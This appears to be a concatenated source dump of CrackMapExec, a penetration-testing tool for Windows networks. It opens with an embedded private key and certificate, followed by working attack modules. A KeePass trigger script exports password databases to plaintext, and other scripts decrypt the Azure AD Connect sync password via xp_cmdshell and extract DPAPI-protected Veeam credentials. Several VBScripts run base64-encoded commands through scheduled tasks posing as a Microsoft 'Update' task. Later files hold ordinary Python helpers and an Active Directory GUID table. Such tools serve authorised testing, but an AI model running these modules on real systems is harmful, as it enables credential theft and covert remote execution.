+JGhUiPAYsLU5dFOomfc81Cq1qx+JWwffKdVykN1fk7gN8iO9TJUK6B8Peq6wWD3
Wb91EBp6YkbtPf52nJpJStevT8fiVQcCl7pt/dLWinCtWzgEtihwXj9l4a4SQuc/
4+OEZSDYWiuvlKY5XeaYBI4J3hGg8MHBXJwJxk7tAoGBALBrop1vJVxZt4+Eb9gv
cc5ZRtDi79MXPePDinhRivVi/48LsYoFXRtodjcAMWqAyH7n17Kxkvl1rRsaNAq/
H4F0kXuTXReV3LtZmZTLXmju2spGz3e3yKqgB+7dWUauqK44WaO1rYz32hTxLxil
kN8k77KmfNkqz+9WY6S4CqIh
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIC+zCCAeOgAwIBAgIUPjiFj6PH8T2dFrcwoqL7bHkXKfQwDQYJKoZIhvcNAQEL
BQAwDTELMAkGA1UEBhMCVVMwHhcNMjAwNTEwMTAyMzA5WhcNMjEwNTEwMTAyMzA5
WjANMQswCQYDVQQGEwJVUzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMtHEINVVeaNwVau+7AhmHrLAs219+xMVDZADKRROXoIbOf6umjP+z8Bfuzb91aS
/6lxRQs014fYB71g2Ezu9CoPMoDhGPUXNU70shCi3cXfZ71JBaTbMnR2Jre5rGut
lNB4s6khJr2DdDSee9+VfYqNqtn85SvFIkDcdGDHQLQ3tubIL+NdJ4zxwtDEmMh0
2nF4x9IDmSh4QQmHNpZkuC0mlfk07Gl4kFF+E9I4veva3apQafNy28ds9mZ3JHAh
EICIk1Idl34KKsJrKmXN1rENnSuUxylp6h05Om6wEuYBYQ/q5AQqtEGAv4BU6jsO
mdwhuYxA+RIDctpKXKH52BECAwEAAaNTMFEwHQYDVR0OBBYEFO+GlEFEBLb5Rv8x
bx/bsBBNgwSxMB8GA1UdIwQYMBaAFO+GlEFEBLb5Rv8xbx/bsBBNgwSxMA8GA1Ud
EwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAHU17UUlL2rl+xLdBDRqcVBb
DUWwvmkBL22G05LcIIjlA7YeeKHBA0D6ppulTZ+HWZ2mo2n10bIso+SryytGrU0g
p9Rt+mUDiWOQJWi0W6VAhK72wsJG5DnRdf5yXjbsY065iA4Q5UfhQd7TsR3q4EkD
5ziOrKiuB5T3PR48aE/Cpg0aTGpx05OEVG6un1xwUpT6d6j5qP2IELaCG446ZZIO
0BrvUoOTwYCV6UhhV1F3xirVFpUwTtp8Ms/fst4vSX9/6PgyBd09icB+O8t9LhXG
b6FMHKpKOOkRQztqJR3ipMlW6Ceslwqs5CBRowbySi3C4kpEplM6hbVTelzwP6U=
-----END CERTIFICATE-----
================================================
FILE: cme/data/keepass_trigger_module/AddKeePassTrigger.ps1
================================================
$ExportPath = "REPLACE_ME_ExportPath"
$ExportName = "REPLACE_ME_ExportName"
$TriggerName = "REPLACE_ME_TriggerName"
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
$TriggerXML = [xml] @"
<Trigger>
<Guid>$([Convert]::ToBase64String([System.GUID]::NewGuid().ToByteArray()))</Guid>
<Name>$TriggerName</Name>
<TurnOffAfterAction>true</TurnOffAfterAction>
<Events>
<Event>
<TypeGuid>bES7XfGLTA2IzmXm6a0pig==</TypeGuid>
<Parameters>
<Parameter>1</Parameter>
<Parameter>False</Parameter>
</Parameters>
</Event>
</Events>
<Conditions />
<Actions>
<Action>
<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
<Parameters>
<Parameter>$ExportPath\$ExportName</Parameter>
<Parameter>KeePass XML (2.x)</Parameter>
<Parameter />
<Parameter />
</Parameters>
</Action>
</Actions>
</Trigger>
"@
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -is [String]) {
$Triggers = $KeePassXML.CreateElement('Triggers')
$Null = $Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))
}
else {
$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))
}
$KeePassXML.Save($KeePassXMLPath)
}
================================================
FILE: cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1
================================================
$KeePassXMLPath = "REPLACE_ME_KeePassXMLPath"
$TriggerName = "REPLACE_ME_TriggerName"
if($KeePassXMLPath -and ($KeePassXMLPath -match '.\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {
$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath
$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
$RandomGUID = [System.GUID]::NewGuid().ToByteArray()
if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -isnot [String]) {
$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}
ForEach($Child in $Children) {
$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)
}
}
try {
$KeePassXML.Save($KeePassXMLPath)
}
catch {
}
}
================================================
FILE: cme/data/keepass_trigger_module/RestartKeePass.ps1
================================================
$KeePassUser = "REPLACE_ME_KeePassUser"
$KeePassBinaryPath = "REPLACE_ME_KeePassBinaryPath"
$DummyServiceName = "REPLACE_ME_DummyServiceName"
schtasks /create /tn "$DummyServiceName" /tr "$KeePassBinaryPath" /ru $KeePassUser /it /sc ONLOGON
taskkill /F /T /IM keepass.exe /FI "USERNAME eq $KeePassUser"
schtasks /run /tn "$DummyServiceName"
Start-Sleep -s 3
schtasks /delete /tn "$DummyServiceName" /F
================================================
FILE: cme/data/msol_dump/msol_dump.ps1
================================================
$sqlbin=@(Get-ChildItem -Path C:\"Program Files"\"Microsoft SQL Server"\ -Filter sqllocaldb.exe -Recurse).fullname
$db=@(cmd /c $sqlbin info | findstr /i ADSy)
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\$db;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
}
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_server_configuration"
return
}
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
if ($reader.Read() -ne $true) {
Write-Host "[!] Error querying mms_management_agent"
return
}
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
$cmd = $client.CreateCommand()
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
$reader = $cmd.ExecuteReader()
$decrypted = [string]::Empty
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
$decrypted += $reader.GetString(0)
}
if ($decrypted -eq [string]::Empty) {
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
return
}
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host "Domain: $($domain.Domain)"
Write-Host "Username: $($username.Username)"
Write-Host "Password: $($password.Password)"
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_mssql.ps1
================================================
$SqlDatabaseName = "REPLACE_ME_SqlDatabase"
$SqlServerName = "REPLACE_ME_SqlServer"
$SqlInstanceName = "REPLACE_ME_SqlInstance"
#Forming the connection string
$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
$auth = "Integrated Security=SSPI;" #Local user
$connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
$connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
$command = New-Object System.Data.OleDb.OleDbCommand $SQL, $connection
#Fetching encrypted credentials from the database
try {
$connection.Open()
$adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command
$dataset = New-Object System.Data.DataSet
[void] $adapter.Fill($dataSet)
$connection.Close()
}
catch {
Write-Host "Can't connect to DB! Exiting..."
exit -1
}
$rows=($dataset.Tables | Select-Object -Expand Rows)
if ($rows.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
$rows | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $rows | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/veeam_dump_module/veeam_dump_postgresql.ps1
================================================
$PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
$PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
$SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
$output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
if ($output.count -eq 0) {
Write-Host "No passwords found!"
exit
}
Add-Type -assembly System.Security
#Decrypting passwords using DPAPI
$output | ForEach-Object -Process {
$EnryptedPWD = [Convert]::FromBase64String($_.password)
$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
$enc = [system.text.encoding]::Default
$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $output | Format-Table -HideTableHeaders | Out-String
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs
================================================
Dim command
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs
================================================
Dim command, outputPath
command = Base64StringDecode("REPLACE_ME_BASE64_COMMAND")
outputPath = "C:\Windows\Temp\REPLACE_ME_OUTPUT_FILE"
On Error Resume Next
Set objTestNewInst = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer.Name=""REPLACE_ME_INSTANCEID""")
If Err.Number <> 0 Then
Err.Clear
If FileExists(outputPath) Then
inputFile = outputPath
Set inStream = CreateObject("ADODB.Stream")
inStream.Open
inStream.type= 1 'TypeBinary
inStream.LoadFromFile(inputFile)
readBytes = inStream.Read()
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = readBytes
Base64Encode = oNode.text
' Write back into wmi class
wbemCimtypeString = 8
Set objClass = GetObject("Winmgmts:root\subscription:ActiveScriptEventConsumer")
Set objInstance = objClass.spawninstance_
objInstance.name="REPLACE_ME_INSTANCEID"
objInstance.scriptingengine="vbscript"
objInstance.scripttext = Base64Encode
objInstance.put_
Else
Const TriggerTypeDaily = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Update"
regInfo.Author = "Microsoft"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
settings.DisallowStartIfOnBatteries = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(7)
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "c:\windows\system32\cmd.exe"
Action.arguments = "/Q /c " & command & " 1> " & outputPath & " 2>&1"
Dim objNet, LoginUser
Set objNet = CreateObject("WScript.Network")
LoginUser = objNet.UserName
If UCase(LoginUser) = "SYSTEM" Then
Else
LoginUser = Empty
End If
Call rootFolder.RegisterTaskDefinition("REPLACE_ME_TEMP_TASKNAME", taskDefinition, 6, LoginUser, , 3)
Call rootFolder.DeleteTask("REPLACE_ME_TEMP_TASKNAME",0)
End If
Else
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(outputPath)
If Err.Number <> 0 Then
Err.Clear
End If
End If
Function FileExists(FilePath)
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(FilePath) Then
FileExists=CBool(1)
Else
FileExists=CBool(0)
End If
End Function
Function Base64StringDecode(ByVal vCode)
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.Position = 0
BinaryStream.Type = 2
' All Format => utf-16le - utf-8 - utf-16le
BinaryStream.CharSet = "utf-8"
Base64StringDecode = BinaryStream.ReadText
Set BinaryStream = Nothing
Set oNode = Nothing
End Function
================================================
FILE: cme/first_run.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from os import mkdir
from os.path import exists
from os.path import join as path_join
import shutil
from cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
from cme.cmedb import initialize_db
from cme.logger import cme_logger
def first_run_setup(logger=cme_logger):
if not exists(TMP_PATH):
mkdir(TMP_PATH)
if not exists(CME_PATH):
logger.display("First time use detected")
logger.display("Creating home directory structure")
mkdir(CME_PATH)
folders = (
"logs",
"modules",
"protocols",
"workspaces",
"obfuscated_scripts",
"screenshots",
)
for folder in folders:
if not exists(path_join(CME_PATH, folder)):
logger.display(f"Creating missing folder {folder}")
mkdir(path_join(CME_PATH, folder))
initialize_db(logger)
if not exists(CONFIG_PATH):
logger.display("Copying default configuration file")
default_path = path_join(DATA_PATH, "cme.conf")
shutil.copy(default_path, CME_PATH)
# if not exists(CERT_PATH):
# logger.display('Generating SSL certificate')
# try:
# check_output(['openssl', 'help'], stderr=PIPE)
# if os.name != 'nt':
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US" > /dev/null 2>&1'.format(path=CERT_PATH))
# else:
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US"'.format(path=CERT_PATH))
# except OSError as e:
# if e.errno == errno.ENOENT:
# logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')
# default_path = path_join(DATA_PATH, 'default.pem')
# shutil.copy(default_path, CERT_PATH)
# else:
# logger.error('Error while generating SSL certificate: {}'.format(e))
# sys.exit(1)
================================================
FILE: cme/helpers/__init__.py
================================================
================================================
FILE: cme/helpers/bash.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from cme.paths import DATA_PATH
def get_script(path):
with open(os.path.join(DATA_PATH, path), "r") as script:
return script.read()
================================================
FILE: cme/helpers/bloodhound.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def add_user_bh(user, domain, logger, config):
users_owned = []
if isinstance(user, str):
users_owned.append({"username": user.upper(), "domain": domain.upper()})
else:
users_owned = user
if config.get("BloodHound", "bh_enabled") != "False":
try:
from neo4j.v1 import GraphDatabase
except:
from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable
uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
driver = GraphDatabase.driver(
uri,
auth=(
config.get("BloodHound", "bh_user"),
config.get("BloodHound", "bh_pass"),
),
encrypted=False,
)
try:
with driver.session() as session:
with session.begin_transaction() as tx:
for info in users_owned:
if info["username"][-1] == "$":
user_owned = info["username"][:-1] + "." + info["domain"]
account_type = "Computer"
else:
user_owned = info["username"] + "@" + info["domain"]
account_type = "User"
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c')
if result.data()[0]["c"].get("owned") in (False, None):
logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
except AuthError as e:
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
return
except ServiceUnavailable as e:
logger.fail(f"Neo4J does not seem to be available on {uri}.")
return
except Exception as e:
logger.fail("Unexpected error with Neo4J")
logger.fail("Account not found on the domain")
return
driver.close()
================================================
FILE: cme/helpers/http.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
def get_desktop_uagent(uagent=None):
desktop_uagents = {
"MSIE9.0": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"MSIE8.0": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)",
"MSIE7.0": "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"MSIE6.0": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Chrome32": "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
"Chrome31": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
"Firefox25": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0",
"Firefox24": "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0,",
"Safari5.1": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Safari5.0": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16",
}
if not uagent:
return desktop_uagents[random.choice(desktop_uagents.keys())]
elif uagent:
return desktop_uagents[uagent]
================================================
FILE: cme/helpers/logger.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from termcolor import colored
def write_log(data, log_name):
logs_dir = os.path.join(os.path.expanduser("~/.cme"), "logs")
with open(os.path.join(logs_dir, log_name), "w") as log_output:
log_output.write(data)
def highlight(text, color="yellow"):
if color == "yellow":
return f"{colored(text, 'yellow', attrs=['bold'])}"
elif color == "red":
return f"{colored(text, 'red', attrs=['bold'])}"
================================================
FILE: cme/helpers/misc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import string
import re
import inspect
import os
def identify_target_file(target_file):
with open(target_file, "r") as target_file_handle:
for i, line in enumerate(target_file_handle):
if i == 1:
if line.startswith("<NessusClientData"):
return "nessus"
elif line.endswith("nmaprun>\n"):
return "nmap"
return "unknown"
def gen_random_string(length=10):
return "".join(random.sample(string.ascii_letters, int(length)))
def validate_ntlm(data):
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
if allowed.match(data):
return True
else:
return False
def called_from_cmd_args():
for stack in inspect.stack():
if stack[3] == "print_host_info":
return True
if stack[3] == "plaintext_login" or stack[3] == "hash_login" or stack[3] == "kerberos_login":
return True
if stack[3] == "call_cmd_args":
return True
return False
# Stolen from https://github.com/pydanny/whichcraft/
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note: This function was backported from the Python 3 source code.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
================================================
FILE: cme/helpers/msada_guids.py
================================================
"""
Impacket - Collection of Python classes for working with network protocols.
SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
This software is provided under a slightly modified version
of the Apache Software License. See the accompanying LICENSE file
for more information.
Authors:
Charlie BROMBERG (@_nwodtuhs)
Guillaume DAUMAS (@BlWasp_)
Lucien DOUSTALY (@Wlayzz)
References:
MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
- [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
- [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
- [MS-ADA3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/4517e835-3ee6-44d4-bb95-a94b6966bfb0
GUIDS gathered from (lots of cleaning made from that source, things may be missing):
- https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1
This library is, for the moment, not present in the Impacket version used by CrackMapExec, so I add it manually in helpers.
"""
SCHEMA_OBJECTS = {
"2a132580-9373-11d1-aebc-0000f80367c1": "FRS-Partner-Auth-Level",
"2a8c68fc-3a7a-4e87-8720-fe77c51cbe74": "ms-DS-Non-Members-BL",
"963d2751-48be-11d1-a9c3-0000f80367c1": "Mscope-Id",
"bf967a0c-0de6-11d0-a285-00aa003049e2": "Range-Lower",
"29259694-09e4-4237-9f72-9306ebe63ab2": "ms-TS-Primary-Desktop",
"963d2756-48be-11d1-a9c3-0000f80367c1": "DHCP-Class",
"1562a632-44b9-4a7e-a2d3-e426c96a3acc": "ms-PKI-Private-Key-Recovery-Agent",
"2a132581-9373-11d1-aebc-0000f80367c1": "FRS-Primary-Member",
"4b1cba4e-302f-4134-ac7c-f01f6c797843": "ms-DS-Phonetic-First-Name",
"7bfdcb7d-4807-11d1-a9c3-0000f80367c1": "Msi-File-List",
"bf967a0d-0de6-11d0-a285-00aa003049e2": "Range-Upper",
"f63aa29a-bb31-48e1-bfab-0a6c5a1d39c2": "ms-TS-Secondary-Desktops",
"5245801a-ca6a-11d0-afff-0000f80367c1": "FRS-Replica-Set-GUID",
"f217e4ec-0836-4b90-88af-2f5d4bbda2bc": "ms-DS-Phonetic-Last-Name",
"d9e18313-8939-11d1-aebc-0000f80367c1": "Msi-Script",
"bf967a0e-0de6-11d0-a285-00aa003049e2": "RDN",
"9daadc18-40d1-4ed1-a2bf-6b9bf47d3daa": "ms-TS-Primary-Desktop-BL",
"e0fa1e8a-9b45-11d0-afdd-00c04fd930c9": "Display-Specifier",
"bf967aa8-0de6-11d0-a285-00aa003049e2": "Print-Queue",
"bf967a8f-0de6-11d0-a285-00aa003049e2": "DMD",
"26d9736b-6070-11d1-a9c6-0000f80367c1": "FRS-Replica-Set-Type",
"6cd53daf-003e-49e7-a702-6fa896e7a6ef": "ms-DS-Phonetic-Department",
"96a7dd62-9118-11d1-aebc-0000f80367c1": "Msi-Script-Name",
"bf967a0f-0de6-11d0-a285-00aa003049e2": "RDN-Att-ID",
"34b107af-a00a-455a-b139-dd1a1b12d8af": "ms-TS-Secondary-Desktop-BL",
"1be8f174-a9ff-11d0-afe2-00c04fd930c9": "FRS-Root-Path",
"5bd5208d-e5f4-46ae-a514-543bc9c47659": "ms-DS-Phonetic-Company-Name",
"bf967937-0de6-11d0-a285-00aa003049e2": "Msi-Script-Path",
"bf967a10-0de6-11d0-a285-00aa003049e2": "Registered-Address",
"faaea977-9655-49d7-853d-f27bb7aaca0f": "MS-TS-Property01",
"5fd4250c-1262-11d0-a060-00aa006c33ed": "Display-Template",
"83cc7075-cca7-11d0-afff-0000f80367c1": "Query-Policy",
"5a8b3261-c38d-11d1-bbc9-0080c76670c0": "SubSchema",
"5245801f-ca6a-11d0-afff-0000f80367c1": "FRS-Root-Security",
"e21a94e4-2d66-4ce5-b30d-0ef87a776ff0": "ms-DS-Phonetic-Display-Name",
"96a7dd63-9118-11d1-aebc-0000f80367c1": "Msi-Script-Size",
"bf967a12-0de6-11d0-a285-00aa003049e2": "Remote-Server-Name",
"3586f6ac-51b7-4978-ab42-f936463198e7": "MS-TS-Property02",
"bf967915-0de6-11d0-a285-00aa003049e2": "Account-Expires",
"ddac0cee-af8f-11d0-afeb-00c04fd930c9": "FRS-Service-Command",
"def449f1-fd3b-4045-98cf-d9658da788b5": "ms-DS-HAB-Seniority-Index",
"9a0dc326-c100-11d1-bbc5-0080c76670c0": "MSMQ-Authenticate",
"bf967a14-0de6-11d0-a285-00aa003049e2": "Remote-Source",
"70004ef5-25c3-446a-97c8-996ae8566776": "MS-TS-ExpireDate",
"bf967aa9-0de6-11d0-a285-00aa003049e2": "Remote-Mail-Recipient",
"bf967a80-0de6-11d0-a285-00aa003049e2": "Attribute-Schema",
"2a132582-9373-11d1-aebc-0000f80367c1": "FRS-Service-Command-Status",
"c881b4e2-43c0-4ebe-b9bb-5250aa9b434c": "ms-DS-Promotion-Settings",
"9a0dc323-c100-11d1-bbc5-0080c76670c0": "MSMQ-Base-Priority",
"bf967a15-0de6-11d0-a285-00aa003049e2": "Remote-Source-Type",
"54dfcf71-bc3f-4f0b-9d5a-4b2476bb8925": "MS-TS-ExpireDate2",
"e0fa1e8b-9b45-11d0-afdd-00c04fd930c9": "Dns-Zone",
"031952ec-3b72-11d2-90cc-00c04fd91ab1": "Account-Name-History",
"1be8f175-a9ff-11d0-afe2-00c04fd930c9": "FRS-Staging-Path",
"98a7f36d-3595-448a-9e6f-6b8965baed9c": "ms-DS-SiteName",
"9a0dc32e-c100-11d1-bbc5-0080c76670c0": "MSMQ-Computer-Type",
